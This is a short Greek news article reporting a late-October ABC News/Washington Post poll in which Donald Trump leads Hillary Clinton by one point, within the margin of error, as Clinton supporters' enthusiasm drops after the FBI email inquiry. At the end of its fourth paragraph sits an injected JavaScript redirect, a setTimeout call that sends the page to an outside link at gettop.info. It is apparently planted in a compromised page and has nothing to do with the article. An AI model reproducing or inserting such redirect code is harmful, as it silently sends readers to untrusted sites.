Ο Τραμπ… βγαίνει μπροστά

0
12

 

Νέα δημοσκόπηση δίνει προβάδισμα μίας ποσοστιαίας μονάδας στον Ντόναλντ Τραμπ έναντι της Χίλαρι Κλίντον καθώς η υποψήφια των Δημοκρατικών βλέπει τον ενθουσιασμό των οπαδών της να καταρρέει μετά την αιφνιδιαστική έρευνα από το FBIS στα email της.

Είναι η πρώτη φορά από τον Μάιο που ο Τραμπ παίρνει προβάδισμα στην έρευνα αυτή για το ABC News και τη Washington Post. Ωστόσο το προβάδισμά του βρίσκεται μέσα στο περιθώριο σφάλματος της έρευνας (3 ποσοστιαίες μονάδες).

«Σε κάθε περίπτωση, η +1 μονάδα του Τραμπ είναι ένα αξιοσημείωτο αποτέλεσμα», υπογραμμίζουν οι υπεύθυνοι της έρευνας του γραφείου Langer Research Associates, η οποία διεξήχθη από τις 27 έως τις 30 Οκτωβρίου. «Δεν είχε περάσει σε ποσοστό την Κλίντον παρά μόνο μία φορά προηγουμένως», στα μέσα Μαΐου.

Το μερίδιο των «πολύ ενθουσιωδών» οπαδών της Χίλαρι μειώθηκε από 52% στις 22 Οκτωβρίου σε 45% την Κυριακή. Περισσότεροι από μισοί από τους οπαδούς του Ντόναλντ Τραμπ (53%) δηλώνουν «πολύ ενθουσιώδεις», καταγράφοντας αύξηση κατά την ίδια περίοδο (ήταν 49% στις 22 Οκτωβρίου). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here